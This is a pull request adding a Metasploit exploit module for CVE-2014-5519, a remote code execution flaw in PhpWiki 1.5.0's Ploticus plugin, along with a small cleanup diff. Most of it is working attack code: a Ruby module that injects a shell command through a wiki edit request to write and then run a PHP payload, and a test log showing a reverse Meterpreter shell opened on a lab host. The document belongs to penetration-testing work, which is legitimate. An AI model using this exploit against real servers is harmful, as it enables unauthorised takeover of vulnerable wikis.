### PR TITLE
Module for CVE-2014-5519, phpwiki/ploticus RCE

### DIFF
--- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb
+++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'CVE', '2014-5519' ],
           [ 'OSVDB', '110576' ],
-          [ 'URL', 'http://www.exploit-db.com/exploits/34451/']
+          [ 'EDB', '34451']
         ],
       'Payload'	       =>
         {
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
         ],
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Sept 11 2014'))
+      'DisclosureDate' => 'Sep 11 2014'))
 
     register_options(
       [
@@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     uri =  target_uri.path
-    peer = "#{rhost}:#{rport}"
 
     payload_name = "#{rand_text_alpha(8)}.php"
     php_payload = get_write_exec_payload(:unlink_self=>true)
@@ -74,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     upload_uri = normalize_uri(uri + "/" + payload_name)
     print_status("#{peer} - Executing payload #{payload_name}")
-    res = send_request_raw({
+    send_request_raw({
       'uri'    => upload_uri,
       'method' => 'GET'
     })

--- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb
+++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb
@@ -1,0 +1,82 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Phpwiki ploticus Remote Code Execution',
+      'Description'    => %q{
+        The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection. 
+      },
+      'Author'         =>
+        [
+          'Benjamin Harris',              # Discovery and POC
+          'us3r777 <us3r777[at]n0b0.so>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-5519' ],
+          [ 'OSVDB', '110576' ],
+          [ 'URL', 'http://www.exploit-db.com/exploits/34451/']
+        ],
+      'Payload'	       =>
+        {
+          'BadChars'   => "\x00",
+        },
+      'Platform'       => 'php',
+      'Arch'		       => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sept 11 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The full URI path to phpwiki', '/phpwiki']) ,
+      ], self.class)
+  end
+
+  def exploit
+    uri =  target_uri.path
+    peer = "#{rhost}:#{rport}"
+
+    payload_name = "#{rand_text_alpha(8)}.php"
+    php_payload = get_write_exec_payload(:unlink_self=>true)
+
+    res = send_request_cgi({
+      'uri'      => normalize_uri(uri + '/index.php/HeIp'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'pagename'      => 'HeIp',
+        'edit[content]' => "<<Ploticus device=\";echo '#{php_payload}' > #{payload_name};\" -prefab= -csmap= data= alt= help= >>",
+        'edit[preview]' => 'Preview',
+        'action'        => 'edit'
+      }
+    })
+
+    if not res or res.code != 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    upload_uri = normalize_uri(uri + "/" + payload_name)
+    print_status("#{peer} - Executing payload #{payload_name}")
+    res = send_request_raw({
+      'uri'    => upload_uri,
+      'method' => 'GET'
+    })
+  end
+end


### PR DESCRIPTION
# Description

The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection. Discovery and POC done by Benjamin Harris.
# Links

http://www.exploit-db.com/exploits/34451/
http://www.cvedetails.com/cve/CVE-2014-5519/
http://seclists.org/fulldisclosure/2014/Aug/77
# Reproduction steps
- [x] Install a LAMP server
- [x] Install phpwiki ( http://sourceforge.net/projects/phpwiki/, the config file can be generated from here : http://phpwiki.fr/ )
# Tests

```
2014-09-16 14:19:04 +0200 S:0 J:0> use exploit/multi/http/phpwiki_ploticus_exec 
2014-09-16 14:19:12 +0200 S:0 J:0 exploit(phpwiki_ploticus_exec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
2014-09-16 14:19:18 +0200 S:0 J:0 exploit(phpwiki_ploticus_exec) > run

[*] Started reverse handler on 192.168.56.1:4444 
[*] 192.168.56.101:80 - Executing payload gpPdLWOs.php
[*] Sending stage (40551 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:55045) at 2014-09-16 14:19:23 +0200

meterpreter > getuid
Server username: www-data (33)
```
